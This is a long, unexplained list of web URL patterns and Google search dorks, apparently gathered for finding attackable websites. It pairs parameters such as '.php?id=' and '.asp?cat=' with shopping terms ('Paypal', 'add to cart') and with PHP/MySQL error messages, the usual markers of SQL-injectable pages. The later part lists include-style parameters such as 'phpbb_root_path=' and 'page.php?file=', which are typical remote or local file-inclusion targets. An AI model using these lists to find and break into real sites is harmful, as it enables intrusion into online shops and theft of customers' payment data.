packages_display.asp?ref=
shop/index.asp?cPath=
modules.asp?bookid=
product-range.asp?rangeID=
en/news/fullnews.asp?newsid=
deal_coupon.asp?cat_id=
show.asp?id=
blog/index.asp?idBlog=
redaktion/whiteteeth/detail.asp?nr=
HistoryStore/pages/item.asp?itemID=
aktuelles/veranstaltungen/detail.asp?id=
tecdaten/showdetail.asp?prodid=
?id=
rating/stat.asp?id=
content.asp?id=
viewapp.asp?id=
item.asp?id=
news/newsitem.asp?newsID=
FernandFaerie/index.asp?c=
show.asp?id=
?cat=
categories.asp?cat=
category.asp?c=

product_info.asp?id=
prod.asp?cat=
store/product.asp?productid=
browsepr.asp?pr=
product-list.asp?cid=
products.asp?cat_id=
product.asp?ItemID=
category.asp?c=
main.asp?id=
article.asp?id=
showproduct.asp?productId=
view_item.asp?item=
skunkworks/content.asp?id=
index.asp?id=
item_show.asp?id=
publications.asp?Id=
index.asp?t=
view_items.asp?id=
portafolio/portafolio.asp?id=
YZboard/view.asp?id=
index_en.asp?ref=
index_en.asp?ref=
category.asp?id_category=
main.asp?id=
main.asp?id=
calendar/event.asp?id=
default.asp?cPath=
pages/print.asp?id=
index.asp?pg_t=
_news/news.asp?id=
forum/showProfile.asp?id=
fr/commande-liste-categorie.asp?panier=
downloads/shambler.asp?id=
sinformer/n/imprimer.asp?id=
More_Details.asp?id=
directory/contenu.asp?id_cat=
properties.asp?id_cat=
forum/showProfile.asp?id=
downloads/category.asp?c=
index.asp?cat=
product_info.asp?products_id=
product_info.asp?products_id=
product-list.asp?category_id=
detail.asp?siteid=
projects/event.asp?id=
view_items.asp?id=
more_details.asp?id=
melbourne_details.asp?id=
more_details.asp?id=
detail.asp?id=
more_details.asp?id=
home.asp?cat=
idlechat/message.asp?id=
detail.asp?id=
print.asp?sid=
more_details.asp?id=
default.asp?cPath=
events/event.asp?id=
brand.asp?id=
toynbeestudios/content.asp?id=
show-book.asp?id=
more_details.asp?id=
store/default.asp?cPath=
property.asp?id=
product_details.asp?id=
more_details.asp?id=
view-event.asp?id=
content.asp?id=
book.asp?id=
page/venue.asp?id=
print.asp?sid=
colourpointeducational/more_details.asp?id=
print.asp?sid=
browse/book.asp?journalID=
section.asp?section=
bookDetails.asp?id=
profiles/profile.asp?profileid=
event.asp?id=
gallery.asp?id=
category.asp?CID=
corporate/newsreleases_more.asp?id=
print.asp?id=
view_items.asp?id=
more_details.asp?id=
county-facts/diary/vcsgen.asp?id=
idlechat/message.asp?id=
podcast/item.asp?pid=
products.asp?act=
details.asp?prodId=
socsci/events/full_details.asp?id=
ourblog.asp?categoryid=
mall/more.asp?ProdID=
archive/get.asp?message_id=
review/review_form.asp?item_id=
english/publicproducts.asp?groupid=
news_and_notices.asp?news_id=
rounds-detail.asp?id=
gig.asp?id=
board/view.asp?no=
index.asp?modus=
news_item.asp?id=
rss.asp?cat=
products/product.asp?id=
details.asp?ProdID=
els_/product/product.asp?id=
store/description.asp?iddesc=
socsci/news_items/full_story.asp?id=
modules/forum/index.asp?topic_id=
feature.asp?id=
products/Blitzball.htm?id=
profile_print.asp?id=
questions.asp?questionid=
html/scoutnew.asp?prodid=
main/index.asp?action=
********.asp?cid=
********.asp?cid=
news.asp?type=
index.asp?page=
viewthread.asp?tid=
summary.asp?PID=
news/latest_news.asp?cat_id=
index.asp?cPath=
category.asp?CID=
index.asp?pid=
more_details.asp?id=
specials.asp?osCsid=
search/display.asp?BookID=
articles.asp?id=
print.asp?sid=
page.asp?id=
more_details.asp?id=
newsite/pdf_show.asp?id=
shop/category.asp?cat_id=
shopcafe-shop-product.asp?bookId=
shop/books_detail.asp?bookID=
index.asp?cPath=
more_details.asp?id=
news.asp?id=

 

more_details.asp?id=
shop/books_detail.asp?bookID=
more_details.asp?id=
blog.asp?blog=
index.asp?pid=
prodotti.asp?id_cat=
category.asp?CID=
more_details.asp?id=
poem_list.asp?bookID=
more_details.asp?id=
content.asp?categoryId=
authorDetails.asp?bookID=
press_release.asp?id=
item_list.asp?cat_id=
colourpointeducational/more_details.asp?id=
index.asp?pid=
download.asp?id=
shop/category.asp?cat_id=
i-know/content.asp?page=
store/index.asp?cat_id=
yacht_search/yacht_view.asp?pid=
pharmaxim/category.asp?cid=
print.asp?sid=
specials.asp?osCsid=
store.asp?cat_id=
category.asp?cid=
displayrange.asp?rangeid=
product.asp?id=
csc/news-details.asp?cat=
products-display-details.asp?prodid=
stockists_list.asp?area_id=
news/newsitem.asp?newsID=
index.asp?pid=
newsitem.asp?newsid=
category.asp?id=
news/newsitem.asp?newsID=
details.asp?prodId=
publications/publication.asp?id=
purelydiamond/products/category.asp?cat=
category.asp?cid=
product/detail.asp?id=
news/newsitem.asp?newsID=
details.asp?prodID=
item.asp?item_id=
edition.asp?area_id=
page.asp?area_id=
view_newsletter.asp?id=
library.asp?cat=
categories.asp?cat=
page.asp?area_id=
categories.asp?cat=
publications.asp?id=
item.asp?sub_id=
page.asp?area_id=
page.asp?area_id=
category.asp?catid=
content.asp?cID=
newsitem.asp?newsid=
frontend/category.asp?id_category=
news/newsitem.asp?newsID=
things-to-do/detail.asp?id=
page.asp?area_id=
page.asp?area_id=
listing.asp?cat=
item.asp?iid=
customer/home.asp?cat=
staff/publications.asp?sn=
news/newsitem.asp?newsID=
library.asp?cat=
main/index.asp?uid=
library.asp?cat=
shop/eventshop/product_detail.asp?itemid=
news/newsitem.asp?newsID=
news/newsitem.asp?newsID=
library.asp?cat=
FullStory.asp?Id=
publications.asp?ID=
publications/book_reviews/full_review.asp?id=
newsitem.asp?newsID=
newsItem.asp?newsId=
site/en/list_service.asp?cat=
page.asp?area_id=
product.asp?ProductID=
releases_headlines_details.asp?id=
product.asp?shopprodid=
product.asp?productid=
product.asp?product=
product.asp?product_id=
productlist.asp?id=
product.asp?shopprodid=
garden_equipment/pest-weed-control/product.asp?pr=
product.asp?shopprodid=
browsepr.asp?pr=
productlist.asp?id=
kshop/product.asp?productid=
product.asp?pid=
showproduct.asp?prodid=
product.asp?productid=
productlist.asp?id=
index.asp?pageId=
productlist.asp?tid=
product-list.asp?id=
onlinesales/product.asp?product_id=
garden_equipment/Fruit-Cage/product.asp?pr=
product.asp?shopprodid=
product_info.asp?products_id=
productlist.asp?tid=
showsub.asp?id=
productlist.asp?fid=
products.asp?cat=
products.asp?cat=
product-list.asp?id=
product.asp?sku=
store/product.asp?productid=
products.asp?cat=
productList.asp?cat=
product_detail.asp?product_id=
product.asp?pid=
wiki/pmwiki.asp?page****=
summary.asp?PID=
productlist.asp?grpid=
cart/product.asp?productid=
db/CART/product_details.asp?product_id=
ProductList.asp?id=
products/product.asp?id=
product.asp?shopprodid=
product_info.asp?products_id=
product_ranges_view.asp?ID=
cei/cedb/projdetail.asp?projID=
products.asp?DepartmentID=
product.asp?shopprodid=
product.asp?shopprodid=
product_info.asp?products_id=
index.asp?news=
education/content.asp?page=
Interior/productlist.asp?id=
products.asp?categoryID=
modules.asp?****=
message/comment_threads.asp?postID=
artist_art.asp?id=
products.asp?cat=
index.asp?option=
ov_tv.asp?item=
index.asp?lang=
showproduct.asp?cat=
index.asp?lang=
product.asp?bid=
product.asp?bid=
cps/rde/xchg/tm/hs.xsl/liens_detail.html?lnkId=
item_show.asp?lid=
?pagerequested=
downloads.asp?id=
print.asp?sid=
print.asp?sid=
product.asp?intProductID=
productList.asp?id=
product.asp?intProductID=
more_details.asp?id=
more_details.asp?id=
books.asp?id=
index.asp?offs=
mboard/replies.asp?parent_id=
Computer Science.asp?id=
news.asp?id=
pdf_post.asp?ID=
reviews.asp?id=
art.asp?id=
prod.asp?cat=
event_info.asp?p=
view_items.asp?id=
home.asp?cat=
item_book.asp?CAT=
www/index.asp?page=
schule/termine.asp?view=
goods_detail.asp?data=
storemanager/contents/item.asp?page_code=
view_items.asp?id=
customer/board.htm?mode=
help/com_view.html?code=
n_replyboard.asp?typeboard=
eng_board/view.asp?T****=
prev_results.asp?prodID=
bbs/view.asp?no=
gnu/?doc=
zb/view.asp?uid=
global/product/product.asp?gubun=
inurl:”.php?cat=”+intext:”Paypal”+site:UK

inurl:”.php?cat=”+intext:”/Buy Now/”+site:.net

inurl:”.php?cid=”+intext:”online+betting”

inurl:”.php?id=” intext:”View cart”

inurl:”.php?id=” intext:”Buy Now”

inurl:”.php?id=” intext:”add to cart”

inurl:”.php?id=” intext:”shopping”

inurl:”.php?id=” intext:”boutique”

inurl:”.php?id=” intext:”/store/”

inurl:”.php?id=” intext:”/shop/”

inurl:”.php?id=” intext:”toys”

inurl:”.php?cid=”

inurl:”.php?cid=” intext:”shopping”

inurl:”.php?cid=” intext:”add to cart”

inurl:”.php?cid=” intext:”Buy Now”

inurl:”.php?cid=” intext:”View cart”

inurl:”.php?cid=” intext:”boutique

inurl:”.php?cid=” intext:”/store/”

inurl:”.php?cid=” intext:”/shop/”

inurl:”.php?cid=” intext:”Toys”

inurl:”.php?cat=”

inurl:”.php?cat=” intext:”shopping”

inurl:”.php?cat=” intext:”add to cart”

inurl:”.php?cat=” intext:”Buy Now”

inurl:”.php?cat=” intext:”View cart”

inurl:”.php?cat=” intext:”boutique

” inurl:”.php?cat=” intext:”/store/”

inurl:”.php?cat=” intext:”/shop/”

inurl:”.php?cat=” intext:”Toys”

inurl:”.php?catid=”

inurl:”.php?catid=” intext:”View cart”

inurl:”.php?catid=” intext:”Buy Now”

inurl:”.php?catid=” intext:”add to cart”

inurl:”.php?catid=” intext:”shopping”

inurl:”.php?catid=” intext:”boutique”

inurl:”.php?catid=” intext:”/store/”

inurl:”.php?catid=” intext:”/shop/”

inurl:”.php?catid=” intext:”Toys”

inurl:”.php?categoryid=”

inurl:”.php?categoryid=” intext:”View cart”

inurl:”.php?categoryid=” intext:”Buy Now”

inurl:”.php?categoryid=” intext:”add to cart”

inurl:”.php?categoryid=” intext:”shopping”

inurl:”.php?categoryid=” intext:”boutique”

inurl:”.php?categoryid=” intext:”/store/”

inurl:”.php?categoryid=” intext:”/shop/”

inurl:”.php?categoryid=” intext:”Toys”

inurl:”.php?pid=”

inurl:”.php?pid=” intext:”shopping”

inurl:”.php?pid=” intext:”add to cart”

inurl:”.php?pid=” intext:”Buy Now”

inurl:”.php?pid=” intext:”View cart”

inurl:”.php?pid=” intext:”boutique”

cat.asp?cat=
productlist.asp?catalogid=

Category.asp?category_id=

Category.cfm?category_id=

category.asp?cid=

category.cfm?cid=

category.asp?cat=

category.cfm?cat=

category.asp?id=

index.cfm?pageid=

category.asp?catid=

Category.asp?c=

Category.cfm?c=

productlist.cfm?catalogid=

productlist.asp?catalogid=

viewitem.asp?catalogid=

viewitem.cfm?catalogid=

catalog.cfm?catalogId=

catalog.asp?catalogId=

department.cfm?dept=

department.asp?dept=

itemdetails.cfm?catalogId=

itemdetails.asp?catalogId=

product_detail.asp?catalogid=

product_detail.cfm?catalogid=

product_list.asp?catalogid=

product_list.cfm?catalogid=

ShowProduct.cfm?CatID=

ShowProduct.asp?CatID=

search_results.cfm?txtsearchParamCat=

search_results.asp?txtsearchParamCat=

itemdetails.cfm?catalogId=

itemdetails.asp?catalogId=

store-page.cfm?go=

store-page.asp?go=

Detail.cfm?CatalogID=

Detail.asp?CatalogID=

browse.cfm?category_id=

view.cfm?category_id=

products.cfm?category_id=

index.cfm?Category_ID=

detail.cfm?id=

category.cfm?id=

showitems.cfm?category_id=

ViewProduct.asp?PID=

ViewProduct.cfm?PID=

shopdisplayproducts.asp?catalogid=

shopdisplayproducts.cfn?catalogid=

displayproducts.cfm?category_id=

displayproducts.asp?category_id=

DisplayProducts.asp?prodcat=

DisplayProducts.cfm?prodcat=x

productDetail.cfm?ProductID=

products.php?subcat_id=

showitem.cfm?id=21

productdetail.cfm?pid=

default.cfm?action=46

products_accessories.asp?CatId=

Store_ViewProducts.asp?Cat=

category.cfm?categoryID=

category.asp?category=

tepeecart.cfm?shopid=

view_product.asp?productID=

ProductDetails.asp?prdId=12

products.cfm?ID=

detail.asp?product_id=

product_detail.asp?product_id=

products.php?subcat_id=

product.php?product_id=

view_product.cfm?productID=

product_details.asp?prodid=

shopdisplayproducts.cfm?id=

displayproducts.cfm?id=
trainers.php?id=
play_old.php?id=
declaration_more.php?decl_id=
Pageid=
games.php?id=
newsDetail.php?id=
staff_id=
historialeer.php?num=
product-item.php?id=
news_view.php?id=
humor.php?id=
communique_detail.php?id=
sem.php3?id=
opinions.php?id=
spr.php?id=
pages.php?id=
chappies.php?id=
prod_detail.php?id=
viewphoto.php?id=
view.php?id=
website.php?id=
hosting_info.php?id=
gery.php?id=
detail.php?ID=
publications.php?id=
Productinfo.php?id=
releases.php?id=
ray.php?id=
produit.php?id=
pop.php?id=
shopping.php?id=
productdetail.php?id=
post.php?id=
section.php?id=
theme.php?id=
page.php?id=
shredder-categories.php?id=
product_ranges_view.php?ID=
shop_category.php?id=
channel_id=
newsid=
news_display.php?getid=
ages.php?id=
clanek.php4?id=
review.php?id=
iniziativa.php?in=
curriculum.php?id=
labels.php?id=
look.php?ID=
galeri_info.php?l=
tekst.php?idt=
newscat.php?id=
newsticker_info.php?idn=
rubrika.php?idr=
offer.php?idf=
“id=” & intext:”Warning: mysql_fetch_array()
“id=” & intext:”Warning: getimagesize()
“id=” & intext:”Warning: session_start()
“id=” & intext:”Warning: mysql_num_rows()
“id=” & intext:”Warning: mysql_query()
“id=” & intext:”Warning: array_merge()
“id=” & intext:”Warning: preg_match()
“id=” & intext:”Warning: ilesize()
“id=” & intext:”Warning: filesize()
index.php?id=
buy.php?category=
article.php?ID=
play_old.php?id=
newsitem.php?num=
top10.php?cat=
historialeer.php?num=
reagir.php?num=
Stray-Questions-View.php?num=
forum_bds.php?num=
game.php?id=
view_product.php?id=
sw_comment.php?id=
news.php?id=
avd_start.php?avd=
event.php?id=
sql.php?id=
news_view.php?id=
select_biblio.php?id=
humor.php?id=
ogl_inet.php?ogl_id=
fiche_spectacle.php?id=
communique_detail.php?id=
sem.php3?id=
kategorie.php4?id=
faq2.php?id=
show_an.php?id=
preview.php?id=
loadpsb.php?id=
opinions.php?id=
spr.php?id=
announce.php?id=
participant.php?id=
download.php?id=
main.php?id=
review.php?id=
chappies.php?id=
read.php?id=
prod_detail.php?id=
article.php?id=
person.php?id=
productinfo.php?id=
showimg.php?id=
view.php?id=
website.php?id=
hosting_info.php?id=
gery.php?id=
rub.php?idr=
view_faq.php?id=
artikelinfo.php?id=
detail.php?ID=
index.php?=
profile_view.php?id=
category.php?id=
publications.php?id=
fellows.php?id=
downloads_info.php?id=
prod_info.php?id=
shop.php?do=part&id=
collectionitem.php?id=
band_info.php?id=
product.php?id=
releases.php?id=
ray.php?id=
produit.php?id=
pop.php?id=
shopping.php?id=
productdetail.php?id=
post.php?id=
viewshowdetail.php?id=
clubpage.php?id=
memberInfo.php?id=
section.php?id=
theme.php?id=
page.php?id=
shredder-categories.php?id=
tradeCategory.php?id=
product_ranges_view.php?ID=
shop_category.php?id=
transcript.php?id=
channel_id=
item_id=
newsid=
trainers.php?id=
news-full.php?id=
news_display.php?getid=
index2.php?option=
readnews.php?id=
newsone.php?id=
product-item.php?id=
pages.php?id=
clanek.php4?id=
viewapp.php?id=

viewphoto.php?id=
galeri_info.php?l=
iniziativa.php?in=
curriculum.php?id=
labels.php?id=
story.php?id=
look.php?ID=
aboutbook.php?id=
“id=” & intext:”Warning: mysql_fetch_assoc()
“id=” & intext:”Warning: is_writable()
“id=” & intext:”Warning: Unknown()
“id=” & intext:”Warning: mysql_result()
“id=” & intext:”Warning: pg_exec()
“id=” & intext:”Warning: require()
buy.php?category=
pageid=
page.php?file=
show.php?id=
newsitem.php?num=
readnews.php?id=
top10.php?cat=
reagir.php?num=
Stray-Questions-View.php?num=
forum_bds.php?num=
game.php?id=
view_product.php?id=
sw_comment.php?id=
news.php?id=
avd_start.php?avd=
event.php?id=
sql.php?id=
select_biblio.php?id=
ogl_inet.php?ogl_id=
fiche_spectacle.php?id=
kategorie.php4?id=
faq2.php?id=
show_an.php?id=
loadpsb.php?id=
announce.php?id=
participant.php?id=
download.php?id=
article.php?id=
person.php?id=
productinfo.php?id=
showimg.php?id=
rub.php?idr=
view_faq.php?id=
artikelinfo.php?id=
index.php?=
profile_view.php?id=
category.php?id=
fellows.php?id=
downloads_info.php?id=
prod_info.php?id=
shop.php?do=part&id=
collectionitem.php?id=
band_info.php?id=
product.php?id=
viewshowdetail.php?id=
clubpage.php?id=
memberInfo.php?id=
tradeCategory.php?id=
transcript.php?id=
item_id=
news-full.php?id=
aboutbook.php?id=
preview.php?id=
material.php?id=
read.php?id=
viewapp.php?id=
story.php?id=
newsone.php?id=
rubp.php?idr=
art.php?idm=
title.php?id=
index1.php?modo=
include.php?*[*]*=
nota.php?pollname=
index3.php?p=
padrao.php?pre=
home.php?pa=
main.php?type=
sitio.php?start=
*.php?include=
general.php?xlink=
show.php?go=
nota.php?ki=
down*.php?oldal=
layout.php?disp=
enter.php?chapter=
base.php?incl=
enter.php?mod=
show.php?corpo=
head.php?*[*]*=
info.php?strona=
template.php?str=
main.php?doshow=
view.php?*[*]*=
index.php?to=
page.php?cmd=
view.php?b=
info.php?option=
show.php?x=
template.php?texto=
index3.php?ir=
print.php?chapter=
file.php?inc=
file.php?cont=
view.php?cmd=
include.php?chapter=
path.php?my=
principal.php?param=
general.php?menue=
index1.php?b=
info.php?chapter=
nota.php?chapter=
general.php?include=
start.php?addr=
index1.php?qry=
index1.php?loc=
page.php?addr=
index1.php?dir=
principal.php?pr=
press.php?seite=
head.php?cmd=
home.php?sec=
home.php?category=
standard.php?cmd=
mod*.php?thispage=
base.php?to=
view.php?choix=
base.php?panel=
template.php?mod=
info.php?j=
blank.php?pref=
sub*.php?channel=
standard.php?in=
general.php?cmd=
pagina.php?panel=
template.php?where=
path.php?channel=
gery.php?seccion=
page.php?tipo=
sitio.php?rub=
pagina.php?u=
file.php?ir=
*inc*.php?sivu=
path.php?start=
page.php?chapter=
home.php?recipe=
enter.php?pname=
layout.php?path=
print.php?open=
mod*.php?channel=
down*.php?phpbb_root_path=
*inc*.php?str=
gery.php?phpbb_root_path=
include.php?middlePart=
sub*.php?destino=
info.php?read=
home.php?sp=
main.php?strona=
sitio.php?get=
sitio.php?index=
index3.php?option=
enter.php?a=
main.php?second=
print.php?pname=
blank.php?itemnav=
blank.php?pagina=
index1.php?d=
down*.php?where=
*inc*.php?include=
path.php?pre=
home.php?loader=
start.php?eval=
index.php?disp=
head.php?mod=
sitio.php?section=
nota.php?doshow=
home.php?seite=
home.php?a=
page.php?url=
pagina.php?left=
layout.php?c=
principal.php?goto=
standard.php?base_dir=
home.php?where=
page.php?sivu=
*inc*.php?adresa=
padrao.php?str=
include.php?my=
show.php?home=
index.php?load=
index3.php?rub=
sub*.php?str=
start.php?index=
nota.php?mod=
sub*.php?mid=
index1.php?*[*]*=
pagina.php?oldal=
padrao.php?loc=
padrao.php?rub=
page.php?incl=
gery.php?disp=
nota.php?oldal=
include.php?u=
principal.php?pagina=
print.php?choix=
head.php?filepath=
include.php?corpo=
sub*.php?action=
head.php?pname=
press.php?dir=
show.php?xlink=
file.php?left=
nota.php?destino=
general.php?module=
index3.php?redirect=
down*.php?param=
default.php?ki=
padrao.php?h=
padrao.php?read=
mod*.php?cont=

index1.php?l=
down*.php?pr=
gery.php?viewpage=
template.php?load=
nota.php?pr=
padrao.php?destino=
index2.php?channel=
principal.php?opcion=
start.php?str=
press.php?*[*]*=
index.php?ev=
pagina.php?pre=
nota.php?content=
include.php?adresa=
sitio.php?t=
index.php?sivu=
principal.php?q=
path.php?ev=
print.php?module=
index.php?loc=
nota.php?basepath=
padrao.php?tipo=
index2.php?in=
principal.php?eval=
file.php?qry=
info.php?t=
enter.php?play=
general.php?var=
principal.php?s=
standard.php?pagina=
standard.php?subject=
base.php?second=
head.php?inc=
pagina.php?basepath=
main.php?pname=
*inc*.php?modo=
include.php?goto=
file.php?pg=
head.php?g=
general.php?header=
start.php?*root*=
enter.php?pref=
index3.php?open=
start.php?module=
main.php?load=
enter.php?pg=
padrao.php?redirect=
pagina.php?my=
gery.php?pre=
enter.php?w=
info.php?texto=
enter.php?open=
base.php?rub=
gery.php?*[*]*=
include.php?cmd=
standard.php?dir=
layout.php?page=
index3.php?pageweb=
include.php?numero=
path.php?destino=
index3.php?home=
default.php?seite=
path.php?eval=
base.php?choix=
template.php?cont=
info.php?pagina=
default.php?x=
default.php?option=
gery.php?ki=
down*.php?second=
blank.php?path=
pagina.php?v=
file.php?pollname=
index3.php?var=
layout.php?goto=
pagina.php?incl=
home.php?action=
include.php?oldal=
print.php?left=
print.php?u=
nota.php?v=
home.php?str=
press.php?panel=
page.php?mod=
default.php?param=
down*.php?texto=
mod*.php?dir=
view.php?where=
blank.php?subject=
path.php?play=
base.php?l=
index2.php?rub=
general.php?opcion=
layout.php?xlink=
padrao.php?name=
pagina.php?nivel=
default.php?oldal=
template.php?k=
main.php?chapter=
layout.php?chapter=
layout.php?incl=
include.php?url=
base.php?sivu=
index.php?link=
sub*.php?cont=
info.php?oldal=
general.php?rub=
default.php?str=
head.php?ev=
sub*.php?path=
view.php?page=
main.php?j=
index2.php?basepath=
gery.php?qry=
main.php?url=
default.php?incl=
show.php?redirect=
index1.php?pre=
general.php?base_dir=
start.php?in=
show.php?abre=
index1.php?home=
home.php?ev=
index2.php?ki=
base.php?pag=
default.php?ir=
general.php?qry=
index2.php?home=
press.php?nivel=
enter.php?pr=
blank.php?loader=
start.php?cmd=
padrao.php?d=
sitio.php?recipe=
principal.php?read=
standard.php?showpage=
main.php?pg=
page.php?panel=
press.php?addr=
template.php?s=
main.php?tipo=
*inc*.php?ev=
padrao.php?page=
show.php?thispage=
home.php?secao=
main.php?start=
enter.php?mid=
press.php?id=
main.php?inc=
index3.php?cmd=
index.php?pname=
press.php?subject=
include.php?sec=
index3.php?xlink=
general.php?texto=
index3.php?go=
index.php?cmd=
index3.php?disp=
index3.php?left=
sub*.php?middle=
show.php?modo=
index1.php?pagina=
head.php?left=
enter.php?phpbb_root_path=
show.php?z=
start.php?basepath=
blank.php?strona=
template.php?y=
page.php?where=
layout.php?category=
index1.php?my=
principal.php?phpbb_root_path=
nota.php?channel=
page.php?choix=
start.php?xlink=
home.php?k=
standard.php?phpbb_root_path=
principal.php?middlePart=
mod*.php?m=
index.php?recipe=
template.php?path=
pagina.php?dir=
sitio.php?abre=
index1.php?recipe=
blank.php?page=
sub*.php?category=
*inc*.php?bOdy=
enter.php?middle=
home.php?path=
down*.php?pre=
base.php?w=
main.php?path=
nota.php?ir=
press.php?link=
gery.php?pollname=
down*.php?open=
down*.php?pageweb=
default.php?eval=
view.php?showpage=
show.php?get=
sitio.php?tipo=
layout.php?cont=
default.php?destino=
padrao.php?seccion=
down*.php?r=
main.php?param=
standard.php?e=
down*.php?in=
nota.php?include=
sitio.php?secao=
print.php?my=
general.php?abre=
general.php?link=
default.php?id=
standard.php?panel=
show.php?channel=
enter.php?r=
index3.php?phpbb_root_path=
gery.php?where=
head.php?middle=
sub*.php?load=
gery.php?sp=
show.php?chapter=
sub*.php?b=
general.php?adresa=
print.php?goto=
sub*.php?sp=
template.php?doshow=
padrao.php?base_dir=
index2.php?my=
include.php?w=
start.php?op=
main.php?section=
view.php?header=
layout.php?menue=
head.php?y=
sub*.php?content=
show.php?type=
base.php?id=
mod*.php?qry=
default.php?strona=
sitio.php?chapter=
gery.php?index=
nota.php?h=
page.php?oldal=
enter.php?panel=
blank.php?t=
start.php?pollname=
sub*.php?module=
enter.php?thispage=
mod*.php?index=
sitio.php?r=
sub*.php?play=
index2.php?doshow=
index2.php?chapter=
show.php?path=
gery.php?to=
info.php?base_dir=
gery.php?abre=
gery.php?pag=
view.php?channel=
default.php?mod=
index.php?op=
general.php?pre=
padrao.php?type=
template.php?pag=
standard.php?pre=
blank.php?ref=
down*.php?z=
general.php?inc=
home.php?read=
pagina.php?section=
default.php?basepath=
index.php?pre=
sitio.php?pageweb=
base.php?seite=
*inc*.php?j=
index2.php?filepath=
file.php?type=
index1.php?oldal=
index2.php?second=
index3.php?sekce=
info.php?filepath=
base.php?opcion=
path.php?category=
index3.php?start=
start.php?rub=
*inc*.php?i=
blank.php?pre=
general.php?channel=
index2.php?OpenPage=
page.php?section=
mod*.php?middle=
index1.php?goFile=
blank.php?action=
principal.php?loader=
sub*.php?op=
main.php?addr=
start.php?mid=
gery.php?secao=
pagina.php?tipo=
index.php?w=
head.php?where=
principal.php?tipo=
press.php?loader=
gery.php?showpage=
gery.php?go=
enter.php?start=
press.php?lang=
general.php?p=
index.php?sekce=
index2.php?get=
sitio.php?go=
include.php?cont=
sub*.php?where=
index3.php?index=
path.php?recipe=
info.php?loader=
print.php?sp=
page.php?phpbb_root_path=
path.php?bOdy=
principal.php?menue=
print.php?cont=
pagina.php?z=
default.php?mid=
blank.php?xlink=

sub*.php?oldal=
general.php?b=
include.php?left=
print.php?sivu=
press.php?OpenPage=
default.php?cont=
general.php?pollname=
template.php?nivel=
enter.php?page=
file.php?middle=
standard.php?str=
gery.php?get=
main.php?v=
down*.php?subject=
enter.php?sivu=
path.php?option=
index.php?strona=
index1.php?choix=
index2.php?f=
press.php?destino=
pagina.php?channel=
principal.php?b=
home.php?include=
head.php?numero=
general.php?ref=
main.php?dir=
gery.php?cont=
principal.php?type=
file.php?param=
default.php?secao=
path.php?pageweb=
info.php?r=
base.php?phpbb_root_path=
main.php?itemnav=
view.php?pg=
pagina.php?choix=
default.php?itemnav=
index2.php?cmd=
layout.php?url=
index.php?path=
index1.php?second=
start.php?modo=
index1.php?get=
index3.php?my=
sub*.php?left=
print.php?inc=
view.php?type=
path.php?*[*]*=
base.php?adresa=
index3.php?oldal=
standard.php?bOdy=
base.php?path=
principal.php?strona=
info.php?l=
template.php?left=
head.php?loc=
page.php?ir=
print.php?path=
down*.php?path=
sitio.php?opcion=
pagina.php?category=
press.php?menu=
index2.php?pref=
sitio.php?incl=
show.php?ki=
index3.php?x=
page.php?strona=
*inc*.php?open=
index3.php?secao=
standard.php?*[*]*=
template.php?basepath=
standard.php?goFile=
index2.php?ir=
file.php?modo=
gery.php?itemnav=
main.php?oldal=
down*.php?showpage=
start.php?destino=
blank.php?rub=
path.php?ir=
layout.php?var=
index1.php?texto=
start.php?pg=
index1.php?showpage=
info.php?go=
path.php?load=
index3.php?abre=
blank.php?where=
info.php?start=
page.php?secao=
nota.php?pag=
nota.php?second=
index2.php?to=
standard.php?name=
start.php?strona=
mod*.php?numero=
press.php?home=
info.php?z=
mod*.php?path=
blank.php?base_dir=
base.php?texto=
nota.php?secc=
index.php?tipo=
index.php?goto=
print.php?pag=
view.php?secao=
general.php?strona=
show.php?my=
page.php?e=
padrao.php?index=
gery.php?thispage=
start.php?base_dir=
default.php?tipo=
gery.php?panel=
standard.php?ev=
standard.php?destino=
general.php?middle=
main.php?basepath=
standard.php?q=
index1.php?tipo=
mod*.php?choix=
template.php?ir=
show.php?adresa=
general.php?mid=
index3.php?adresa=
pagina.php?sec=
template.php?secao=
home.php?w=
general.php?content=
sub*.php?recipe=
main.php?category=
enter.php?viewpage=
main.php?ir=
show.php?pageweb=
principal.php?ir=
default.php?pageweb=
index.php?oldal=
head.php?d=
gery.php?mid=
index.php?type=
standard.php?j=
show.php?oldal=
enter.php?link=
enter.php?content=
blank.php?filepath=
standard.php?channel=
base.php?*[*]*=
info.php?incl=
down*.php?include=
press.php?modo=
file.php?choix=
press.php?type=
blank.php?goto=
index3.php?showpage=
principal.php?subject=
start.php?chapter=
show.php?r=
pagina.php?thispage=
general.php?chapter=
page.php?base_dir=
page.php?qry=
show.php?incl=
page.php?*[*]*=
main.php?h=
file.php?seccion=
default.php?pre=
principal.php?index=
principal.php?inc=
home.php?z=
pagina.php?in=
show.php?play=
nota.php?subject=
default.php?secc=
default.php?loader=
padrao.php?var=
mod*.php?b=
default.php?showpage=
press.php?channel=
pagina.php?ev=
sitio.php?name=
page.php?option=
press.php?mid=
down*.php?corpo=
view.php?get=
print.php?thispage=
principal.php?home=
show.php?param=
standard.php?sivu=
index3.php?panel=
include.php?play=
path.php?cmd=
file.php?sp=
template.php?section=
view.php?str=
blank.php?left=
nota.php?lang=
path.php?sivu=
main.php?e=
default.php?ref=
start.php?seite=
default.php?inc=
print.php?disp=
home.php?h=
principal.php?loc=
index3.php?sp=
gery.php?var=
sub*.php?base_dir=
path.php?middle=
pagina.php?str=
base.php?play=
base.php?v=
sitio.php?sivu=
main.php?r=
file.php?nivel=
start.php?sivu=
template.php?c=
general.php?second=
sub*.php?mod=
home.php?loc=
head.php?corpo=
standard.php?op=
index2.php?inc=
info.php?pref=
base.php?basepath=
print.php?basepath=
*inc*.php?m=
base.php?home=
layout.php?strona=
padrao.php?url=
sitio.php?oldal=
pagina.php?read=
index1.php?go=
standard.php?s=
page.php?eval=
index.php?j=
pagina.php?pr=
start.php?secao=
template.php?*[*]*=
nota.php?get=
index3.php?link=
home.php?e=
gery.php?name=
nota.php?eval=
sub*.php?abre=
index2.php?load=
principal.php?in=
view.php?load=
mod*.php?action=
default.php?p=
head.php?c=
template.php?viewpage=
view.php?mid=
padrao.php?addr=
view.php?go=
file.php?basepath=
home.php?pre=
include.php?goFile=
layout.php?play=
index1.php?subject=
info.php?middlePart=
down*.php?pg=
sub*.php?bOdy=
index.php?option=
sub*.php?chapter=
default.php?t=
head.php?opcion=
nota.php?panel=
sitio.php?left=
show.php?include=
pagina.php?start=
head.php?choix=
index3.php?tipo=
index3.php?choix=
down*.php?channel=
base.php?pa=
nota.php?sekce=
show.php?l=
show.php?index=
blank.php?url=
start.php?thispage=
nota.php?play=
show.php?second=
enter.php?include=
principal.php?middle=
main.php?where=
padrao.php?link=
path.php?strona=
index3.php?read=
mod*.php?module=
